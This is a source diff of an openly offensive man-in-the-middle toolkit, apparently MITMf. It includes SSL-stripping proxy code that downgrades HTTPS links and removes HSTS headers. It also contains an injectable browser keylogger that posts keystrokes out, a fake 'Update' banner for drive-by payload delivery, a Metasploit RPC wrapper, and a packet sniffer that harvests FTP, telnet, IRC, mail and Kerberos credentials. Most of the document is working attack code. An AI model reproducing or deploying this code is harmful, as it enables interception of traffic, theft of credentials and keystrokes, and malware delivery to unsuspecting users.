log.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
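As a quick illustration of the cookieExpression used by handleHeader() above, stripping the Secure attribute keeps session cookies usable over the downgraded HTTP connection (the Set-Cookie value is a made-up example):

value = "SID=abc123; Path=/; Secure"
print(SSLServerConnection.cookieExpression.sub("\g<1>", value))
# -> SID=abc123; Path=/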

@ -0,0 +1,195 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
import random
import zlib
import gzip
import StringIO
import sys
from core.logger import logger
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_ServerConnection", formatter)
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we don't like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.clientInfo = None
self.urlMonitor = URLMonitor.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getPostPrefix(self):
return "POST"
def sendRequest(self):
if self.command == 'GET':
log.debug(self.client.getClientIP() + "Sending Request: {}".format(self.headers['host']))
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.iteritems():
log.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
self.transport.write(self.postData)
def connectionMade(self):
log.debug("[ServerConnection] HTTP connection made.")
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
log.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
log.debug("[ServerConnection] Response is image content, not scanning")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
log.debug("[ServerConnection] Response is compressed")
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
log.debug("[ServerConnection] Zapped a strict-transport-security header")
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
for header, value in self.client.headers.iteritems():
log.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
try:
HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
log.debug("[ServerConnection] Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
data = self.replaceSecureLinks(data)
log.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data)
except:
pass
try:
self.shutdown()
except:
log.info("[ServerConnection] Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
log.debug("[ServerConnection] Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass


@ -0,0 +1,50 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from core.logger import logger
from twisted.internet.protocol import ClientFactory
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_ServerConnectionFactory", formatter)
class ServerConnectionFactory(ClientFactory):
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
def buildProtocol(self, addr):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
log.debug("Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
log.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
try:
self.client.finish()
except:
pass


@ -0,0 +1,83 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import re
import os
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
cookies = dict()
hijack_client = ''
_instance = None
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = dict()
@staticmethod
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
if pathIndex == -1:
pathIndex = len(url)
url += "/"
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
# read the port before trimming it off the host, otherwise the port value is always lost
port = host[portIndex+1:]
host = host[0:portIndex]
if len(port) == 0:
port = 443
url = method + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
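# Example (hypothetical values): addSecureLink("10.0.0.5", "https://mail.example.com:8443/inbox")
# stores ("10.0.0.5", "https://mail.example.com/inbox") in strippedURLs and maps
# that tuple to port 8443 in strippedURLPorts.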

core/html/htadriveby.html Normal file

@ -0,0 +1,71 @@
<script>
var newHTML = document.createElement('div');
newHTML.innerHTML = ' \
<style type="text/css"> \
\
#headerupdate { \
display:none; \
position: fixed !important; \
top: 0 !important; \
left: 0 !important; \
z-index: 2000 !important; \
width: 100% !important; \
height: 40px !important; \
overflow: hidden !important; \
font-size: 14px !important; \
color: black !important; \
font-weight: normal !important; \
background-color:#F0F0F0 !important; \
border-bottom: 1px solid #A0A0A0 !important; \
\
} \
\
#headerupdate h1 { \
float: left !important; \
margin-left: 2px !important; \
margin-top: 14px !important; \
padding-left: 30px !important; \
font-weight:normal !important; \
font-size: 13px !important; \
\
background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABsAAAAOCAYAAADez2d9AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAACnSURBVDhP5ZRNCgMhDIWj6ELwFt7JE3gkT+GRPIVLwZ8Wpy4KNXFm6KLQDx4qgbwkoiyl9AAE7z0opUBrDaUUyDmDc24bw+BzXVJrnbsX72cqhkF2FmMEKSUIIaD3fiQ0xmxjGKhZCOFIcgXOOVhr5+kTdIyj0mF2RbtRomattVuiQM1WlZ8RxW90tkp0RhR/aLa6/DOiQM0YY8tklMajpiC/q+8C8AS167V3qBALWwAAAABJRU5ErkJggg==") no-repeat left top !important; \
} \
\
#headerupdate ul { \
padding: 0 !important; \
text-align: right !important; \
} \
\
#headerupdate li { \
display: inline-block !important; \
margin: 0px 15px !important; \
text-align: left !important; \
} \
\
</style> \
<div id="headerupdate"> \
<h1> \
<strong> \
_TEXT_GOES_HERE_ \
</strong> \
</h1> \
\
<ul> \
\
<li> \
<a target="_blank" href="http://_IP_GOES_HERE_/_PAYLOAD_GOES_HERE_"> \
<button type="button" style="font-size: 100%; margin-top: 5px; padding: 2px 5px 2px 5px; color: black;"> \
Update \
</button> \
\
</a> \
</li> \
</ul> \
</div> \
';
document.body.appendChild(newHTML);
document.getElementById("headerupdate").style.display = "block";
</script>


@ -0,0 +1,117 @@
window.onload = function (){
var2 = ",";
name = '';
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener){
//console.log("first");
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
}
else if (window.attachEvent){
//console.log("second");
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
}
else {
//console.log("third");
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 0)
{
var3 = e.charCode
}
if (var3 != "d" && var3 != 8 && var3 != 9 && var3 != 13)
{
andxhr(encodeURIComponent(var3), srcname);
}
}
function function1(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(encodeURIComponent(var3), srcname);
}
else if (var3 == 0)
{
text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(encodeURIComponent(text), srcname);
}
}
}
function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}
var2= var2 + key + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=utf-8");
xhr.send(var2 + '&&' + inputName);
if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

core/logger.py Normal file

@ -0,0 +1,46 @@
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
class logger:
log_level = None
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def setup_logger(self, name, formatter, logfile='./logs/mitmf.log'):
fileHandler = logging.FileHandler(logfile)
fileHandler.setFormatter(formatter)
streamHandler = logging.StreamHandler(sys.stdout)
streamHandler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.propagate = False
logger.addHandler(streamHandler)
logger.addHandler(fileHandler)
logger.setLevel(self.log_level)
return logger
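# Minimal usage sketch (assumes ./logs/ exists and that the caller has set the
# shared level first, e.g. logger.log_level = logging.INFO):
#   fmt = logging.Formatter("%(asctime)s [Example] %(message)s")
#   log = logger().setup_logger("Example", fmt)
#   log.info("hello")   # written to stdout and appended to ./logs/mitmf.log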

core/mitmfapi.py Normal file

@ -0,0 +1,100 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
"""
Originally coded by @xtr4nge
"""
#import multiprocessing
import threading
import logging
import json
import sys
from flask import Flask
from core.configwatcher import ConfigWatcher
from core.proxyplugins import ProxyPlugins
app = Flask(__name__)
class mitmfapi(ConfigWatcher):
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
self.host = self.config['MITMf']['MITMf-API']['host']
self.port = int(self.config['MITMf']['MITMf-API']['port'])
@app.route("/")
def getPlugins():
# example: http://127.0.0.1:9999/
pdict = {}
#print ProxyPlugins().plugin_list
for activated_plugin in ProxyPlugins().plugin_list:
pdict[activated_plugin.name] = True
#print ProxyPlugins().all_plugins
for plugin in ProxyPlugins().all_plugins:
if plugin.name not in pdict:
pdict[plugin.name] = False
#print ProxyPlugins().pmthds
return json.dumps(pdict)
@app.route("/<plugin>")
def getPluginStatus(plugin):
# example: http://127.0.0.1:9090/cachekill
for p in ProxyPlugins().plugin_list:
if plugin == p.name:
return json.dumps("1")
return json.dumps("0")
@app.route("/<plugin>/<status>")
def setPluginStatus(plugin, status):
# example: http://127.0.0.1:9090/cachekill/1 # enabled
# example: http://127.0.0.1:9090/cachekill/0 # disabled
if status == "1":
for p in ProxyPlugins().all_plugins:
if (p.name == plugin) and (p not in ProxyPlugins().plugin_list):
ProxyPlugins().add_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
elif status == "0":
for p in ProxyPlugins().plugin_list:
if p.name == plugin:
ProxyPlugins().remove_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
return json.dumps({"plugin": plugin, "response": "failed"})
def startFlask(self):
app.run(debug=False, host=self.host, port=self.port)
#def start(self):
# api_thread = multiprocessing.Process(name="mitmfapi", target=self.startFlask)
# api_thread.daemon = True
# api_thread.start()
def start(self):
api_thread = threading.Thread(name='mitmfapi', target=self.startFlask)
api_thread.setDaemon(True)
api_thread.start()
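# Usage sketch for the HTTP API defined above (host/port come from the
# [MITMf][MITMf-API] config section; 127.0.0.1:9999 is only an example):
#   GET /             -> JSON map of every plugin name to its enabled state
#   GET /cachekill    -> "1" if that plugin is currently active, else "0"
#   GET /cachekill/1  -> activates the plugin, /cachekill/0 deactivates it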


@ -20,66 +20,124 @@
# USA
#
import requests
import msgpack
import logging
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
class Msfrpc:
class MsfError(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MsfAuthError(MsfError):
def __init__(self,msg):
self.msg = msg
def __init__(self,opts=[]):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "55552"
self.uri = opts.get('uri') or "/api/"
self.ssl = opts.get('ssl') or False
self.token = None
self.headers = {"Content-type" : "binary/message-pack"}
def encode(self, data):
return msgpack.packb(data)
def decode(self, data):
return msgpack.unpackb(data)
def call(self, method, opts=[]):
if method != 'auth.login':
if self.token == None:
raise self.MsfAuthError("MsfRPC: Not Authenticated")
if method != "auth.login":
opts.insert(0, self.token)
if self.ssl == True:
url = "https://%s:%s%s" % (self.host, self.port, self.uri)
else:
url = "http://%s:%s%s" % (self.host, self.port, self.uri)
opts.insert(0, method)
payload = self.encode(opts)
r = requests.post(url, data=payload, headers=self.headers)
opts[:] = [] #Clear opts list
return self.decode(r.content)
def login(self, user, password):
auth = self.call("auth.login", [user, password])
try:
if auth['result'] == 'success':
self.token = auth['token']
return True
except:
raise self.MsfAuthError("MsfRPC: Authentication failed")
class Msf(ConfigWatcher):
'''
This is just a wrapper around the Msfrpc class;
it avoids a lot of code duplication throughout the framework
'''
def __init__(self):
try:
self.msf = Msfrpc({"host": self.config['MITMf']['Metasploit']['rpcip'],
"port": self.config['MITMf']['Metasploit']['rpcport']})
self.msf.login('msf', self.config['MITMf']['Metasploit']['rpcpass'])
except Exception as e:
shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e))
@property
def version(self):
return self.msf.call('core.version')['version']
def jobs(self):
return self.msf.call('job.list')
def jobinfo(self, pid):
return self.msf.call('job.info', [pid])
def killjob(self, pid):
return self.msf.call('job.kill', [pid])
def findjobs(self, name):
jobs = self.jobs()
pids = []
for pid, jobname in jobs.iteritems():
if name in jobname:
pids.append(pid)
return pids
def sessions(self):
return self.msf.call('session.list')
def sessionsfrompeer(self, peer):
sessions = self.sessions()
for n, v in sessions.iteritems():
if peer in v['tunnel_peer']:
return n
return None
def sendcommand(self, cmd):
#Create a virtual console
console_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [console_id, cmd])
if __name__ == '__main__':

core/netcreds.py Normal file

@ -0,0 +1,929 @@
# re, sys and copy are used below; import them explicitly rather than relying on scapy's wildcard import
import re
import sys
import copy
import logging
import binascii
import struct
import base64
import threading
from core.logger import logger
from os import geteuid, devnull
from sys import exit
from urllib import unquote
from collections import OrderedDict
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from scapy.all import *
conf.verb=0
formatter = logging.Formatter("%(asctime)s [NetCreds] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("NetCreds", formatter)
DN = open(devnull, 'w')
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
mail_auths = OrderedDict()
telnet_stream = OrderedDict()
# Regexs
authenticate_re = '(www-|proxy-)?authenticate'
authorization_re = '(www-|proxy-)?authorization'
ftp_user_re = r'USER (.+)\r\n'
ftp_pw_re = r'PASS (.+)\r\n'
irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
irc_pw_re = r'NS IDENTIFY (.+)'
irc_pw_re2 = 'nickserv :identify (.+)'
mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
mail_auth_re1 = '(\d+ )?login '
NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
parsing_pcap = False
class NetCreds:
version = "1.0"
def sniffer(self, interface, ip):
try:
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0)
except Exception as e:
if "Interrupted system call" in e: pass
def start(self, interface, ip):
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True)
t.start()
def parse_pcap(self, pcap):
global parsing_pcap
parsing_pcap = True
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
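# pkt_frag_loads maps "src_ip:port" -> OrderedDict(ack -> reassembled TCP payload),
# e.g. {"10.0.0.5:51234": OrderedDict([("987654321", "USER bob\r\nPASS hunter2\r\n")])}
# (addresses and credentials above are made up, purely to show the shape of the store)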
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def pkt_parser(pkt):
'''
Start parsing packets here
'''
global pkt_frag_loads, mail_auths
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
# SNMP community strings
if pkt.haslayer(SNMP):
parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
return
# Kerberos over UDP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
# Limit the packets we regex to increase efficiency
# 750 is a bit arbitrary but some SMTP auth success pkts
# are 500+ characters
if 0 < len(full_load) < 750:
# FTP
ftp_creds = parse_ftp(full_load, dst_ip_port)
if len(ftp_creds) > 0:
for msg in ftp_creds:
printer(src_ip_port, dst_ip_port, msg)
return
# Mail
mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
# IRC
irc_creds = irc_logins(full_load, pkt)
if irc_creds != None:
printer(src_ip_port, dst_ip_port, irc_creds)
return
# Telnet
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
Catch telnet logins and passwords
'''
global telnet_stream
msg = None
if src_ip_port in telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
telnet_stream[src_ip_port] += load.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
telnet_split = telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
msg = 'Telnet %s: %s' % (cred_type, value)
printer(src_ip_port, dst_ip_port, msg)
del telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(telnet_stream) > 100:
telnet_stream.popitem(last=False)
mod_load = load.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
telnet_stream[dst_ip_port] = 'password '
def ParseMSKerbv5TCP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
def ParseMSKerbv5UDP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
# I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
